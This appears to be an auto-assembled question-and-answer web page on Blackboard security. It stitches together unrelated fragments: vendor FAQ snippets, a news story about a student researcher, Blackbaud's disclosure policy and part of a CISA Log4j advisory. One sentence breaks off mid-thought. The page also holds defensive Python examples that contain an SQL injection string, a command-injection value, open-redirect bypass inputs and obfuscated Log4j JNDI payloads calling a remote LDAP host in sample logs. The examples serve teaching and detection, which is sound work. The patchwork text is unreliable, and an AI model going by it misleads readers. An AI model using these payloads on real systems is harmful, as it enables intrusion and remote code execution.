blackboard vulnerability

by Heather Lockman | 9 min read

Is Blackboard secure?

Blackboard follows a secure-by-default policy; its Release Notes and Documentation call out the cases that require special System Administrator consideration. Blackboard encourages customers to follow its Secure Configuration best practices guide where one is available and relevant to your specific Blackboard product.

Is Blackboard encrypted?

Encryption at rest is available and enabled by default for all new Blackboard Learn SaaS environments. Environments created prior to release version 3200.10.

What are the 4 main types of security vulnerability?

Security vulnerability types:
- Network vulnerabilities. These are issues with a network's hardware or software that expose it to possible intrusion by an outside party.
- Operating system vulnerabilities.
- Human vulnerabilities.
- Process vulnerabilities.

What is the most common security vulnerability?

The most common software security vulnerabilities include:
- Missing data encryption
- OS command injection
- SQL injection
- Buffer overflow
- Missing authentication for a critical function
- Missing authorization
- Unrestricted upload of dangerous file types
- Reliance on untrusted inputs in a security decision
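Two of the items above, SQL injection and OS command injection, side by side with their fixes. This is an added example written for this page, not code from Blackboard or from any of the sources quoted; the users table, the sample rows and the hostname allow-list are constructed for the demonstration, and the function names are this example's own.

```python
"""Added example (not from the original page): SQL injection and OS
command injection next to the parameterized / argv-based fixes, run
against an in-memory SQLite database seeded with constructed rows."""
import re
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users with different roles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "student"), ("bob", "instructor"), ("carol", "admin")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str):
    # Untrusted input becomes part of the SQL text, so it can rewrite the query:
    # name = "x' OR '1'='1" turns a single-row lookup into a dump of the table.
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str):
    # The driver binds the value separately from the statement; it is never
    # parsed as SQL, so the same payload simply matches no user.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


# Allow-list for a DNS hostname (constructed for this example): letters,
# digits and hyphens in dot-separated labels, nothing the shell cares about.
_HOSTNAME = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def echo_host_vulnerable(host: str) -> str:
    # shell=True hands the whole string to /bin/sh, so a ';' in the input
    # ends the intended command and starts an attacker-chosen one.
    out = subprocess.run(f"echo {host}", shell=True, capture_output=True, text=True)
    return out.stdout


def echo_host_safe(host: str) -> str:
    # Validate against the allow-list, then pass the value as one argv
    # element with no shell involved; metacharacters are just bytes.
    if not _HOSTNAME.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    out = subprocess.run(["echo", host], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))
    print("safe:      ", find_user_safe(db, payload))
    print(repr(echo_host_vulnerable("example.com; echo INJECTED")))
    print(repr(echo_host_safe("example.com")))
```

The two fixes share one principle: keep data out of the channel that carries code. Parameter binding keeps the value out of the SQL parser; an argv list keeps it out of the shell parser, and the allow-list narrows what the called program itself will ever see.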

What can be tracked in Blackboard?

Blackboard can monitor and record candidates' exam environment through their computer's webcam and microphone, record the computer screen, and monitor and restrict right-clicking, minimizing, screen capture, opening a new window, and various other actions. (Mar 30, 2022)

Does Blackboard have two factor authentication?

Two-step verification and secure single sign-on with SAASPASS will help keep your firm's Blackboard access secure.

What are Owasp top 10 vulnerabilities?

OWASP Top 10 vulnerabilities:
- Injection. Injection occurs when untrusted input is passed to an interpreter (SQL, an OS shell, LDAP and so on) as part of a command or query, so that attacker-supplied data is executed as code.
- Broken Authentication.
- Sensitive Data Exposure.
- XML External Entities.
- Broken Access Control.
- Security Misconfiguration.
- Cross-Site Scripting.
- Insecure Deserialization.

Which of the following are examples of vulnerabilities?

Other examples of vulnerability include these:
- A weakness in a firewall that lets hackers get into a computer network.
- Unlocked doors at businesses.
- Lack of security cameras.
(Jan 12, 2022)

What are vulnerabilities and their types?

That list groups security vulnerabilities into three main categories according to the underlying weakness: porous defenses, risky resource management, and insecure interaction between components. (Aug 28, 2019)

What are the Owasp Top 10 vulnerabilities for 2020?

OWASP Top 10 web application security risks and vulnerabilities to watch out for in 2020:
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization

What are three types of software vulnerabilities?

List of software security vulnerabilities and weaknesses:
- Bugs
- Exposure of sensitive data
- Injection flaws
- Buffer overflow
- Security misconfiguration
- Broken access control
- Insecure deserialization
- Broken or missing authentication

Can you give me an example of common security vulnerabilities?

What are the most common security threats? The top 10 internet security threats are:
- Injection
- Broken authentication
- Cross-site scripting (XSS)
- Insecure direct object references
- Security misconfiguration
- Sensitive data exposure
- Missing function-level authorization
- Cross-site request forgery (CSRF)
- Use of components with known vulnerabilities
- Unvalidated redirects and forwards
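One item in that list that is easy to get wrong in practice is the unvalidated redirect: a login page that sends the user to whatever a next parameter says, which phishing pages abuse to bounce victims from a trusted domain to an attacker's site. The check below is an added example written for this page (not Blackboard's code or any quoted source's); the function name and the default landing path are assumptions, and the rejected inputs are the browser parsing quirks a practitioner has to account for, not just the obvious https://evil.com form.

```python
"""Added example (not from the original page): validate a post-login
redirect target so the application only ever redirects to its own paths."""
from urllib.parse import urlsplit


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return target if it is a same-site absolute path, otherwise default.

    Assumed policy: only paths starting with a single '/' are acceptable;
    anything that a browser could resolve to another host is refused.
    """
    if not target:
        return default
    # CR/LF or other control characters could split the Location header.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return default
    # Browsers treat backslashes as forward slashes in URLs, so
    # "/\evil.com" is read as "//evil.com" (a scheme-relative URL).
    if "\\" in target:
        return default
    parts = urlsplit(target)
    # Any scheme or host means an off-site target. This also catches
    # "https:evil.com" (scheme, no netloc) and "javascript:..." URLs.
    if parts.scheme or parts.netloc:
        return default
    # Must be a path with exactly one leading slash: "//evil.com" and
    # "///evil.com" are scheme-relative and resolve to another host.
    if not target.startswith("/") or target.startswith("//"):
        return default
    return target


if __name__ == "__main__":
    for candidate in ["/courses/123", "//evil.com/", "https://evil.com",
                      "/\\evil.com", "https:evil.com", "javascript:alert(1)",
                      "/login\r\nSet-Cookie: x=1", "courses", "///evil.com"]:
        print(repr(candidate), "->", repr(safe_redirect_target(candidate)))
```

The alternative to a path-only policy is an explicit allow-list of hostnames; either way the decision must be made on the parsed URL plus the browser-specific quirks shown above, never on a substring match such as "contains our domain".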

About Blackboard

Blackboard is a leading EdTech company, serving higher education, K-12, business and government clients around the world. We connect a deep understanding of education with the power of technology to continuously push the boundaries of learning.

Vulnerability Disclosure Policy

Blackboard's vulnerability management program is governed by this public-facing Vulnerability Management Commitment and Disclosure Policy below. No software vendor is perfect - in the event a security vulnerability is identified in a released product, Blackboard's Security Team is ready to respond.

What are the bugs in Blackboard?

For Blackboard, those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records —though not every school seemed to store data in every field. Only 34,000 of the records included immunization history, for instance. More than 5,000 schools appeared to be included in the data, with roughly 5 million individual records in total, including students, teachers, and other staff.

What law forbids unauthorized access to a company's network?

By the time Demirkapi had gained that level of access to Follett's software, however, he was two years into his hacking escapades and slightly better informed about legal dangers like the Computer Fraud and Abuse Act, which forbids gaining unauthorized access to a company's network.

What is Follett's bug?

Among Follett's bugs, he found that he could add a "group resource" to his school's account, a file that would be available to all users and, more importantly for Demirkapi, that would trigger a push notification with the resource's name to everyone in his school district who had Follett's Aspen app installed.

Did Demirkapi sue Blackboard?

With Blackboard, whose sensitive data he had accessed in the process of testing the software's security, he worked out a contract that stated the company wouldn't sue him, and in return he'd keep the company's vulnerabilities secret until they were fixed, after refusing an initial draft in which Blackboard tried to prevent him from telling anyone even after the patches went through.

Does Blackbaud work with security researchers?

Provide Blackbaud reasonable time to fix any reported issue, before such information is shared with a third party or disclosed publicly. Blackbaud will work with the security researcher and indicate approval for sharing publicly.

Does Blackbaud have legal rights?

Blackbaud reserves all legal rights in the event of noncompliance with these guidelines. Once a report is submitted, Blackbaud commits to provide prompt acknowledgement of receipt of all reports and will keep you reasonably informed of the status of any validated vulnerability that you report through this program.

Summary

Note: CISA will continue to update this webpage as well as our community-sourced GitHub repository as we have further guidance to impart and additional vendor information to provide.

Technical Details

The CVE-2021-44228 RCE vulnerability, affecting Apache's Log4j library versions 2.0-beta9 through 2.14.1, exists in the way the Java Naming and Directory Interface (JNDI) resolves variables. Log4j performs lookup substitution on ${...} expressions that appear in logged data, including attacker-controlled fields such as HTTP headers, and a ${jndi:ldap://...} lookup makes the JVM contact the named directory server and load what it returns, so an attacker who can get such a string into a log message can run code on the logging host.
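A first-pass detection over web access logs, as an added example that is not part of the CISA advisory or any vendor tooling: it undoes URL encoding and the common nested-lookup obfuscations (${lower:...}, ${upper:...}, and the ${prefix:key:-default} form) before looking for a JNDI lookup, so that a payload like ${${lower:j}ndi:...} is not missed by a plain substring match. The log lines and the 203.0.113.7 address are constructed samples, and the function names are this example's own.

```python
"""Added example (not from the CISA advisory): normalize common Log4j
lookup obfuscations and flag log lines that carry a JNDI lookup.
The access-log lines below are constructed samples, not real traffic."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: one with no further ${ } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# prefix:key:-default, which also matches the empty-prefix form ${::-j}.
_DEFAULT = re.compile(r"^[^:]*:[^:]*:-(.*)$", re.S)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _fold(m: "re.Match[str]") -> str:
    """Replace one innermost lookup with the text Log4j would resolve it to."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                      # the lookup we are hunting: keep it
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    d = _DEFAULT.match(body)
    if d:                                      # ${env:UNSET:-j} or ${::-j} -> "j"
        return d.group(1)
    return m.group(0)                          # unknown lookup: leave as is


def normalize(text: str, rounds: int = 10) -> str:
    """Undo URL encoding (twice, for double-encoded payloads) and collapse
    nested lookups from the inside out until nothing changes."""
    text = unquote(unquote(text))
    for _ in range(rounds):
        folded = _INNER.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def find_jndi_lookups(lines):
    """Return (line_index, normalized_line) for each line with a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample access-log lines (combined log format).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, line in find_jndi_lookups(SAMPLE_LOGS):
        print(idx, line)
```

This only finds what was logged: the vulnerable field is often a header that the access log never records, and the normalization is a heuristic that a determined attacker can route around, so treat a hit as confirmation of exposure and treat a miss as nothing at all. Patching to a fixed Log4j release and blocking outbound LDAP/RMI from application hosts are the controls; this is triage.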

Resources

This information is provided “as-is” for informational purposes only. CISA does not endorse any company, product, or service referenced below.
